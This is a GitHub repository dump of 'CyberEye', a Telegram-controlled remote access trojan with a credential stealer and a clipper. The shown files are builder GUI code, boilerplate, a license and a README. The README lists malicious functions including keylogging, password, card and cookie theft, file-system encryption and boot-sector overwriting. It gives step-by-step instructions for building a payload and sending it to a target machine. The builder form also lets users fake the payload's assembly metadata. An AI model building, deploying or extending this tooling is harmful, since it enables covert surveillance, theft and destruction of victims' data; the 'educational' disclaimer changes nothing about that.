System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 234 | this.label10.Location = new System.Drawing.Point(1, 264); 235 | this.label10.Name = "label10"; 236 | this.label10.Size = new System.Drawing.Size(151, 20); 237 | this.label10.TabIndex = 22; 238 | this.label10.Text = "Assembly Version"; 239 | // 240 | // label11 241 | // 242 | this.label11.AutoSize = true; 243 | this.label11.Font = new System.Drawing.Font("Microsoft Sans Serif", 12F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 244 | this.label11.Location = new System.Drawing.Point(1, 236); 245 | this.label11.Name = "label11"; 246 | this.label11.Size = new System.Drawing.Size(148, 20); 247 | this.label11.TabIndex = 21; 248 | this.label11.Text = "Assembly Culture"; 249 | // 250 | // label12 251 | // 252 | this.label12.AutoSize = true; 253 | this.label12.Font = new System.Drawing.Font("Microsoft Sans Serif", 12F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 254 | this.label12.Location = new System.Drawing.Point(1, 210); 255 | this.label12.Name = "label12"; 256 | this.label12.Size = new System.Drawing.Size(175, 20); 257 | this.label12.TabIndex = 20; 258 | this.label12.Text = "Assembly Trademark"; 259 | // 260 | // label13 261 | // 262 | this.label13.AutoSize = true; 263 | this.label13.Font = new System.Drawing.Font("Microsoft Sans Serif", 12F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 264 | this.label13.Location = new System.Drawing.Point(1, 289); 265 | this.label13.Name = "label13"; 266 | this.label13.Size = new System.Drawing.Size(180, 20); 267 | this.label13.TabIndex = 23; 268 | this.label13.Text = "Assembly FileVersion"; 269 | // 270 | // button1 271 | // 272 | this.button1.Location = new System.Drawing.Point(423, 12); 273 | this.button1.Name = "button1"; 274 | this.button1.Size = new System.Drawing.Size(75, 318); 275 | this.button1.TabIndex = 24; 276 | this.button1.Text = "Change"; 277 | this.button1.UseVisualStyleBackColor = true; 278 | this.button1.Click += new System.EventHandler(this.button1_Click); 279 | // 280 | // FrmAssemblyChanger 281 | // 282 | this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F); 283 | this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; 284 | this.ClientSize = new System.Drawing.Size(506, 339); 285 | this.Controls.Add(this.button1); 286 | this.Controls.Add(this.label13); 287 | this.Controls.Add(this.label10); 288 | this.Controls.Add(this.label11); 289 | this.Controls.Add(this.label12); 290 | this.Controls.Add(this.label7); 291 | this.Controls.Add(this.label8); 292 | this.Controls.Add(this.label9); 293 | this.Controls.Add(this.label6); 294 | this.Controls.Add(this.label5); 295 | this.Controls.Add(this.label4); 296 | this.Controls.Add(this.textBox10); 297 | this.Controls.Add(this.textBox9); 298 | this.Controls.Add(this.textBox8); 299 | this.Controls.Add(this.textBox7); 300 | this.Controls.Add(this.textBox6); 301 | this.Controls.Add(this.textBox5); 302 | this.Controls.Add(this.textBox4); 303 | this.Controls.Add(this.textBox3); 304 | this.Controls.Add(this.textBox2); 305 | this.Controls.Add(this.textBox1); 306 | this.Controls.Add(this.label3); 307 | this.Controls.Add(this.label2); 308 | this.Controls.Add(this.label1); 309 | this.Controls.Add(this.pictureBox1); 310 | this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedSingle; 311 | this.Name = "FrmAssemblyChanger"; 312 | this.Text = "Cyber Eye Assembly Changer https://github.com/cisamu123/CyberEye"; 313 | this.Load += new System.EventHandler(this.FrmAssemblyChanger_Load); 314 | ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit(); 315 | this.ResumeLayout(false); 316 | this.PerformLayout(); 317 | 318 | } 319 | 320 | #endregion 321 | 322 | private System.Windows.Forms.PictureBox pictureBox1; 323 | private System.Windows.Forms.Label label1; 324 | private System.Windows.Forms.Label label2; 325 | private System.Windows.Forms.Label label3; 326 | private System.Windows.Forms.TextBox textBox1; 327 | private System.Windows.Forms.TextBox textBox2; 328 | private System.Windows.Forms.TextBox textBox3; 329 | private System.Windows.Forms.TextBox textBox4; 330 | private System.Windows.Forms.TextBox textBox5; 331 | private System.Windows.Forms.TextBox textBox6; 332 | private System.Windows.Forms.TextBox textBox7; 333 | private System.Windows.Forms.TextBox textBox8; 334 | private System.Windows.Forms.TextBox textBox9; 335 | private System.Windows.Forms.TextBox textBox10; 336 | private System.Windows.Forms.Label label4; 337 | private System.Windows.Forms.Label label5; 338 | private System.Windows.Forms.Label label6; 339 | private System.Windows.Forms.Label label7; 340 | private System.Windows.Forms.Label label8; 341 | private System.Windows.Forms.Label label9; 342 | private System.Windows.Forms.Label label10; 343 | private System.Windows.Forms.Label label11; 344 | private System.Windows.Forms.Label label12; 345 | private System.Windows.Forms.Label label13; 346 | private System.Windows.Forms.Button button1; 347 | } 348 | } -------------------------------------------------------------------------------- /CyberEye.Client.Builder/FrmAssemblyChanger.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : Cisamu 3 | ^ Name : CyberEye-RAT 4 | ^ Github : https://github.com/cisamu123 5 | > This program is distributed for educational purposes only. 6 | */ 7 | using System; 8 | using System.Windows.Forms; 9 | 10 | namespace CyberEye.Client.Builder 11 | { 12 | public partial class FrmAssemblyChanger : Form 13 | { 14 | public FrmAssemblyChanger() 15 | { 16 | InitializeComponent(); 17 | } 18 | 19 | private void button1_Click(object sender, EventArgs e) 20 | { 21 | frmBuild.AssemblyTitle = textBox1.Text; 22 | frmBuild.AssemblyDescription = textBox2.Text; 23 | frmBuild.AssemblyConfiguration = textBox3.Text; 24 | frmBuild.AssemblyCompany = textBox4.Text; 25 | frmBuild.AssemblyProduct = textBox5.Text; 26 | frmBuild.AssemblyCopyright = textBox6.Text; 27 | frmBuild.AssemblyTrademark = textBox7.Text; 28 | frmBuild.AssemblyCulture = textBox8.Text; 29 | frmBuild.AssemblyVersion = textBox9.Text; 30 | frmBuild.AssemblyFileVersion = textBox10.Text; 31 | this.Close(); 32 | } 33 | 34 | private void FrmAssemblyChanger_Load(object sender, EventArgs e) 35 | { 36 | textBox1.Text = frmBuild.AssemblyTitle; 37 | textBox2.Text = frmBuild.AssemblyDescription; 38 | textBox3.Text = frmBuild.AssemblyConfiguration; 39 | textBox4.Text = frmBuild.AssemblyCompany; 40 | textBox5.Text = frmBuild.AssemblyProduct; 41 | textBox6.Text = frmBuild.AssemblyCopyright; 42 | textBox7.Text = frmBuild.AssemblyTrademark; 43 | textBox8.Text = frmBuild.AssemblyCulture; 44 | textBox9.Text = frmBuild.AssemblyVersion; 45 | textBox10.Text = frmBuild.AssemblyFileVersion; 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /CyberEye.Client.Builder/FrmAssemblyChanger.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | -------------------------------------------------------------------------------- /CyberEye.Client.Builder/FrmBuild.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | -------------------------------------------------------------------------------- /CyberEye.Client.Builder/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Threading.Tasks; 5 | using System.Windows.Forms; 6 | 7 | namespace CyberEye.Client.Builder 8 | { 9 | internal static class Program 10 | { 11 | /// 12 | /// The main entry point for the application. 13 | /// 14 | [STAThread] 15 | static void Main() 16 | { 17 | Application.EnableVisualStyles(); 18 | Application.SetCompatibleTextRenderingDefault(false); 19 | Application.Run(new frmBuild()); 20 | } 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /CyberEye.Client.Builder/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("CyberEye.Client.Builder")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("CyberEye.Client.Builder")] 13 | [assembly: AssemblyCopyright("Copyright © 2025")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("052597a3-d8b3-470e-ba24-e782333dc7f6")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /CyberEye.Client.Builder/Properties/Resources.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace CyberEye.Client.Builder.Properties { 12 | using System; 13 | 14 | 15 | /// 16 | /// A strongly-typed resource class, for looking up localized strings, etc. 17 | /// 18 | // This class was auto-generated by the StronglyTypedResourceBuilder 19 | // class via a tool like ResGen or Visual Studio. 20 | // To add or remove a member, edit your .ResX file then rerun ResGen 21 | // with the /str option, or rebuild your VS project. 22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0")] 23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 25 | internal class Resources { 26 | 27 | private static global::System.Resources.ResourceManager resourceMan; 28 | 29 | private static global::System.Globalization.CultureInfo resourceCulture; 30 | 31 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] 32 | internal Resources() { 33 | } 34 | 35 | /// 36 | /// Returns the cached ResourceManager instance used by this class. 37 | /// 38 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 39 | internal static global::System.Resources.ResourceManager ResourceManager { 40 | get { 41 | if (object.ReferenceEquals(resourceMan, null)) { 42 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("CyberEye.Client.Builder.Properties.Resources", typeof(Resources).Assembly); 43 | resourceMan = temp; 44 | } 45 | return resourceMan; 46 | } 47 | } 48 | 49 | /// 50 | /// Overrides the current thread's CurrentUICulture property for all 51 | /// resource lookups using this strongly typed resource class. 52 | /// 53 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 54 | internal static global::System.Globalization.CultureInfo Culture { 55 | get { 56 | return resourceCulture; 57 | } 58 | set { 59 | resourceCulture = value; 60 | } 61 | } 62 | 63 | /// 64 | /// Looks up a localized resource of type System.Drawing.Bitmap. 65 | /// 66 | internal static System.Drawing.Bitmap cybereye { 67 | get { 68 | object obj = ResourceManager.GetObject("cybereye", resourceCulture); 69 | return ((System.Drawing.Bitmap)(obj)); 70 | } 71 | } 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /CyberEye.Client.Builder/Properties/Resources.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 122 | ..\Resources\cybereye.jpg;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a 123 | 124 | -------------------------------------------------------------------------------- /CyberEye.Client.Builder/Properties/Settings.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace CyberEye.Client.Builder.Properties 12 | { 13 | 14 | 15 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 16 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")] 17 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase 18 | { 19 | 20 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); 21 | 22 | public static Settings Default 23 | { 24 | get 25 | { 26 | return defaultInstance; 27 | } 28 | } 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /CyberEye.Client.Builder/Properties/Settings.settings: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /CyberEye.Client.Builder/Resources/cybereye.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/CyberEye.Client.Builder/Resources/cybereye.jpg -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU LESSER GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | 9 | This version of the GNU Lesser General Public License incorporates 10 | the terms and conditions of version 3 of the GNU General Public 11 | License, supplemented by the additional permissions listed below. 12 | 13 | 0. Additional Definitions. 14 | 15 | As used herein, "this License" refers to version 3 of the GNU Lesser 16 | General Public License, and the "GNU GPL" refers to version 3 of the GNU 17 | General Public License. 18 | 19 | "The Library" refers to a covered work governed by this License, 20 | other than an Application or a Combined Work as defined below. 21 | 22 | An "Application" is any work that makes use of an interface provided 23 | by the Library, but which is not otherwise based on the Library. 24 | Defining a subclass of a class defined by the Library is deemed a mode 25 | of using an interface provided by the Library. 26 | 27 | A "Combined Work" is a work produced by combining or linking an 28 | Application with the Library. The particular version of the Library 29 | with which the Combined Work was made is also called the "Linked 30 | Version". 31 | 32 | The "Minimal Corresponding Source" for a Combined Work means the 33 | Corresponding Source for the Combined Work, excluding any source code 34 | for portions of the Combined Work that, considered in isolation, are 35 | based on the Application, and not on the Linked Version. 36 | 37 | The "Corresponding Application Code" for a Combined Work means the 38 | object code and/or source code for the Application, including any data 39 | and utility programs needed for reproducing the Combined Work from the 40 | Application, but excluding the System Libraries of the Combined Work. 41 | 42 | 1. Exception to Section 3 of the GNU GPL. 43 | 44 | You may convey a covered work under sections 3 and 4 of this License 45 | without being bound by section 3 of the GNU GPL. 46 | 47 | 2. Conveying Modified Versions. 48 | 49 | If you modify a copy of the Library, and, in your modifications, a 50 | facility refers to a function or data to be supplied by an Application 51 | that uses the facility (other than as an argument passed when the 52 | facility is invoked), then you may convey a copy of the modified 53 | version: 54 | 55 | a) under this License, provided that you make a good faith effort to 56 | ensure that, in the event an Application does not supply the 57 | function or data, the facility still operates, and performs 58 | whatever part of its purpose remains meaningful, or 59 | 60 | b) under the GNU GPL, with none of the additional permissions of 61 | this License applicable to that copy. 62 | 63 | 3. Object Code Incorporating Material from Library Header Files. 64 | 65 | The object code form of an Application may incorporate material from 66 | a header file that is part of the Library. You may convey such object 67 | code under terms of your choice, provided that, if the incorporated 68 | material is not limited to numerical parameters, data structure 69 | layouts and accessors, or small macros, inline functions and templates 70 | (ten or fewer lines in length), you do both of the following: 71 | 72 | a) Give prominent notice with each copy of the object code that the 73 | Library is used in it and that the Library and its use are 74 | covered by this License. 75 | 76 | b) Accompany the object code with a copy of the GNU GPL and this license 77 | document. 78 | 79 | 4. Combined Works. 80 | 81 | You may convey a Combined Work under terms of your choice that, 82 | taken together, effectively do not restrict modification of the 83 | portions of the Library contained in the Combined Work and reverse 84 | engineering for debugging such modifications, if you also do each of 85 | the following: 86 | 87 | a) Give prominent notice with each copy of the Combined Work that 88 | the Library is used in it and that the Library and its use are 89 | covered by this License. 90 | 91 | b) Accompany the Combined Work with a copy of the GNU GPL and this license 92 | document. 93 | 94 | c) For a Combined Work that displays copyright notices during 95 | execution, include the copyright notice for the Library among 96 | these notices, as well as a reference directing the user to the 97 | copies of the GNU GPL and this license document. 98 | 99 | d) Do one of the following: 100 | 101 | 0) Convey the Minimal Corresponding Source under the terms of this 102 | License, and the Corresponding Application Code in a form 103 | suitable for, and under terms that permit, the user to 104 | recombine or relink the Application with a modified version of 105 | the Linked Version to produce a modified Combined Work, in the 106 | manner specified by section 6 of the GNU GPL for conveying 107 | Corresponding Source. 108 | 109 | 1) Use a suitable shared library mechanism for linking with the 110 | Library. A suitable mechanism is one that (a) uses at run time 111 | a copy of the Library already present on the user's computer 112 | system, and (b) will operate properly with a modified version 113 | of the Library that is interface-compatible with the Linked 114 | Version. 115 | 116 | e) Provide Installation Information, but only if you would otherwise 117 | be required to provide such information under section 6 of the 118 | GNU GPL, and only to the extent that such information is 119 | necessary to install and execute a modified version of the 120 | Combined Work produced by recombining or relinking the 121 | Application with a modified version of the Linked Version. (If 122 | you use option 4d0, the Installation Information must accompany 123 | the Minimal Corresponding Source and Corresponding Application 124 | Code. If you use option 4d1, you must provide the Installation 125 | Information in the manner specified by section 6 of the GNU GPL 126 | for conveying Corresponding Source.) 127 | 128 | 5. Combined Libraries. 129 | 130 | You may place library facilities that are a work based on the 131 | Library side by side in a single library together with other library 132 | facilities that are not Applications and are not covered by this 133 | License, and convey such a combined library under terms of your 134 | choice, if you do both of the following: 135 | 136 | a) Accompany the combined library with a copy of the same work based 137 | on the Library, uncombined with any other library facilities, 138 | conveyed under the terms of this License. 139 | 140 | b) Give prominent notice with the combined library that part of it 141 | is a work based on the Library, and explaining where to find the 142 | accompanying uncombined form of the same work. 143 | 144 | 6. Revised Versions of the GNU Lesser General Public License. 145 | 146 | The Free Software Foundation may publish revised and/or new versions 147 | of the GNU Lesser General Public License from time to time. Such new 148 | versions will be similar in spirit to the present version, but may 149 | differ in detail to address new problems or concerns. 150 | 151 | Each version is given a distinguishing version number. If the 152 | Library as you received it specifies that a certain numbered version 153 | of the GNU Lesser General Public License "or any later version" 154 | applies to it, you have the option of following the terms and 155 | conditions either of that published version or of any later version 156 | published by the Free Software Foundation. If the Library as you 157 | received it does not specify a version number of the GNU Lesser 158 | General Public License, you may choose any version of the GNU Lesser 159 | General Public License ever published by the Free Software Foundation. 160 | 161 | If the Library as you received it specifies that a proxy can decide 162 | whether future versions of the GNU Lesser General Public License shall 163 | apply, that proxy's public statement of acceptance of any version is 164 | permanent authorization for you to choose that version for the 165 | Library. 166 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 👁️ CyberEye (RAT + STEALER + CLIPPER) 2 | Modded Program for remote control of windows computers via telegram bot. Written in C# 3 |

4 | 5 |

6 |
7 | 8 | LinkedIn Badge 9 | 10 | 11 | LinkedIn Badge 12 | 13 |
14 | 15 | ### LEGAL DISCLAIMER PLEASE READ! 16 | ##### I, the creator and all those associated with the development and production of this program are not responsible for any actions and or damages caused by this software. You bear the full responsibility of your actions and acknowledge that this software was created for educational purposes only. This software's intended purpose is NOT to be used maliciously, or on any system that you do not have own or have explicit permission to operate and use this program on. By using this software, you automatically agree to the above. 17 | 18 | # :fallen_leaf: Original Functions: 19 | ComputerInfo, BatteryInfo, Location, Whois, ActiveWindow, Webcam, Microphone, Desktop, Keylogger, ClipboardSet, ClipboardGet, ProcessList, ProcessKill, ProcessStart, TaskManagerDisable, TaskManagerEnable, MinimizeAllWindows, MaximizeAllWindows, GetPasswords, GetCreditCards, GetHistory, GetBookmarks, GetCookies, GetDesktop, GetFileZilla, GetDiscord, GetTelegram, GetSteam, OpenCD, CloseCD, DownloadFile, UploadFile, RunFile, RunFileAdmin, ListFiles, RemoveFile, RemoveDir, MoveFile, MoveDir, CopyFile, CopyDir, Speak, Shell, MessageBox, OpenURL, SendKeyPress, NetDiscover, AudioVolumeSet, AudioVolumeGet, SetWallPaper, BlockInput, Monitor(off/on), DisplayRotate, EncryptFileSystem, DecryptFileSystem,ForkBomb, BsoD, OverwriteBootSector, Shutdown, Reboot, Hibernate, Logoff, Help, About, Uninstall. 20 | 21 | # Ⓜ Modded Functions: 22 | AssemblyInfoChanging(config.cs), Beep, Cycle, Tray, SetRandomCurPos, Compiler, DirOrFile, Wifi_Steal, Regedit, Windefender, Cmd, SystemRestore, ScreenResolution, isAdmin, BugReport, Minecraft, CamList, MonitorList. 23 | # :hammer: Compiling guide using Builder: 24 | 25 | * Go to the [@BotFather](https://t.me/BotFather) bot and create your own bot. You need to save the token and bot name. 26 | ![](images/createBot.JPG) 27 | * Now you need to get your chat id. To do this, go to the next bot [@chatid_echo_bot](https://t.me/chatid_echo_bot) and save the id. 28 | ![](images/chatidBot.JPG) 29 | * Now you need to download [Latest stable release](https://github.com/cisamu123/CyberEye/releases) 30 | ![](images/DownloadAndUnzipBuilder.jpg) 31 | * After downloading the `.zip` archive, extract it to any folder on your system. 32 | * Inside the extracted folder, run the file `CyberEye.Client.Builder.exe` 33 | ![](images/ExecuteBuilder.jpg) 34 | * ⚠️ **Important:** Make sure to also move the entire `Stub` folder (included in the archive) to the **same directory** as the Builder. 35 | Without the `Stub` folder in the correct location, the builder will not be able to generate the final payload. 36 | * In the builder, fill in the required fields: 37 | - **Bot Token** (from [@BotFather](https://t.me/BotFather)) 38 | - **Chat ID** (from [@chatid_echo_bot](https://t.me/chatid_echo_bot)) 39 | - Enable optional features using checkboxes (e.g., Autorun, BSOD Protection, etc.) 40 | 41 | * Click **Build**, then choose where to save the final `.exe` payload. 42 | ![](images/BuilderBuild.jpg) 43 | 44 | ✅ That’s it — no need to touch Visual Studio. Just fill, click, and deploy! 45 | * You can send the generated .exe payload to your target machine. 46 | * After starting the file, you can control the computer through the bot. 47 | ![](images/openMalware.JPG) 48 | * Write `/help` to see all available commands. 49 | ### **This release introduces a new standalone payload builder for CyberEye RAT, enabling users to generate customized payloads with ease.** 50 | 51 | ## 🔑 Key Features 52 | 53 | > Creating and customizing your own RAT has never been easier. 54 | > With the new **Builder**, you no longer need to open Visual Studio, manually edit config files, or compile the project yourself. 55 | > Simply run the Builder, fill in your desired options, and generate a fully working stub with just one click. 56 | 57 | ### 🧱 Builder Highlights 58 | - **No coding required** – Everything is done through a user-friendly GUI. 59 | - **Instant build** – Generates a ready-to-use executable without needing Visual Studio or any compiler setup. 60 | - **Secure Telegram Integration** – Easily input your bot token and chat ID. 61 | - **Fully configurable** – Set all options directly from the Builder (admin rights, startup behavior, delay, wallet stealer, etc.). 62 | 63 | --- 64 | 65 | > Developed by **Cisamu** 66 | > Now enhanced with an easy-to-use Builder to streamline your workflow. 67 | 68 | # :hammer: Alternative (OLD) Compiling guide using Visual Studio: 69 | * Go to the [@BotFather](https://t.me/BotFather) bot and create your own bot. You need to save the token and bot name. 70 | ![](images/createBot.JPG) 71 | * Now you need to get your chat id. To do this, go to the next bot [@chatid_echo_bot](https://t.me/chatid_echo_bot) and save the id. 72 | ![](images/chatidBot.JPG) 73 | * Now you need to download [Visual Studio](https://visualstudio.microsoft.com/en/vs/) 74 | ![](images/vs.JPG) 75 | * Download the [source code](https://github.com/cisamu123/CyberEye/archive/refs/heads/main.zip) of this program. 76 | ![](images/loadSourceCode.JPG) 77 | * Unzip the “Telegram RAT” folder to your desktop. 78 | * Open the TelegramRAT.sln file through Visual Studio. 79 | * Open file config.cs in project. 80 | ![](images/openConfig.JPG) 81 | * Insert your token from the bot and your chatID that you received earlier. 82 | * Above you need to select ”Release”. 83 | ![](images/saveConfig.JPG) 84 | * Press CTRL + S to save. And CTRL + B to compile everything into an executable file. 85 | ![](images/build.JPG) 86 | * You can send the received file to someone. 87 | * After starting the file, you can control the computer through the bot. 88 | ![](images/openMalware.JPG) 89 | * Write `/help` to see all available commands. 90 | 91 | ## Star History 92 | 93 | [![Star History Chart](https://api.star-history.com/svg?repos=cisamu123/CyberEye&type=Date)](https://star-history.com/#cisamu123/CyberEye&Date) 94 | 95 | # :moneybag: Donate: 96 | **BTC:** `bc1q5exw2v9sa0yktp2t7xnq8ma2xpn5a29s7w283y` 97 | **ETH:** `0x8d797249170d263B959A3c688D8456adBcfBC319` 98 | **XMRT:** `0xF978FE35d00A201eB48aB3908993e14f312001a2` 99 | 100 |

👽 ORIGINAL RAT VERSION

101 | -------------------------------------------------------------------------------- /TelegramRAT.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.5.33516.290 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "TelegramRAT", "TelegramRAT\TelegramRAT.csproj", "{1BCFE538-14F4-4BEB-9A3F-3F9472794902}" 7 | EndProject 8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "CyberEye.Client.Builder", "CyberEye.Client.Builder\CyberEye.Client.Builder.csproj", "{052597A3-D8B3-470E-BA24-E782333DC7F6}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|Any CPU = Debug|Any CPU 13 | Debug|x64 = Debug|x64 14 | Debug|x86 = Debug|x86 15 | Release|Any CPU = Release|Any CPU 16 | Release|x64 = Release|x64 17 | Release|x86 = Release|x86 18 | EndGlobalSection 19 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 20 | {1BCFE538-14F4-4BEB-9A3F-3F9472794902}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 21 | {1BCFE538-14F4-4BEB-9A3F-3F9472794902}.Debug|Any CPU.Build.0 = Debug|Any CPU 22 | {1BCFE538-14F4-4BEB-9A3F-3F9472794902}.Debug|x64.ActiveCfg = Debug|Any CPU 23 | {1BCFE538-14F4-4BEB-9A3F-3F9472794902}.Debug|x64.Build.0 = Debug|Any CPU 24 | {1BCFE538-14F4-4BEB-9A3F-3F9472794902}.Debug|x86.ActiveCfg = Debug|Any CPU 25 | {1BCFE538-14F4-4BEB-9A3F-3F9472794902}.Debug|x86.Build.0 = Debug|Any CPU 26 | {1BCFE538-14F4-4BEB-9A3F-3F9472794902}.Release|Any CPU.ActiveCfg = Release|Any CPU 27 | {1BCFE538-14F4-4BEB-9A3F-3F9472794902}.Release|Any CPU.Build.0 = Release|Any CPU 28 | {1BCFE538-14F4-4BEB-9A3F-3F9472794902}.Release|x64.ActiveCfg = Release|Any CPU 29 | {1BCFE538-14F4-4BEB-9A3F-3F9472794902}.Release|x64.Build.0 = Release|Any CPU 30 | {1BCFE538-14F4-4BEB-9A3F-3F9472794902}.Release|x86.ActiveCfg = Release|Any CPU 31 | {1BCFE538-14F4-4BEB-9A3F-3F9472794902}.Release|x86.Build.0 = Release|Any CPU 32 | {052597A3-D8B3-470E-BA24-E782333DC7F6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 33 | {052597A3-D8B3-470E-BA24-E782333DC7F6}.Debug|Any CPU.Build.0 = Debug|Any CPU 34 | {052597A3-D8B3-470E-BA24-E782333DC7F6}.Debug|x64.ActiveCfg = Debug|Any CPU 35 | 